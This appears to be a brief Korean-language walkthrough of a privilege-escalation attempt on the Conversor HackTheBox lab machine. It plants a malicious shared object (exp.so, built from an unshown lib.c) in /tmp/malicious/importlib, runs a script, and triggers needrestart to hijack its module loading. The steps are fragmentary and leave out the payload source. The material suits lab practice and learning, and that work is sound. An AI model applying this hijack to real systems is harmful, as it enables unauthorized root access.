
이걸 Conversor HTB 머신에서 시도해 봤습니다
안녕하세요, 저는 0x3bs입니다.
피해자 머신에서:
set -e
cd /tmp
# 1. Create the malicious module directory structure
mkdir -p malicious/importlib
공격자 머신에서
lib.c 를 공격자 머신에서 컴파일하려면 :
gcc -shared -fPIC -o exp.so lib.c
그리고 피해자 머신에서 :
/tmp 에서
chmod +x run.sh
/tmp/malicious/importlib 에서 :
chmod +x exp.so
./exp.so
# try to run it after run 'run.sh' if it didn't work
그리고 /tmp 에서
./run.sh
그리고 다른 세션에서 needrestart를 실행하세요
기억하세요 >> exp.so 는 반드시 /tmp/malicious/importlib 에 있어야 합니다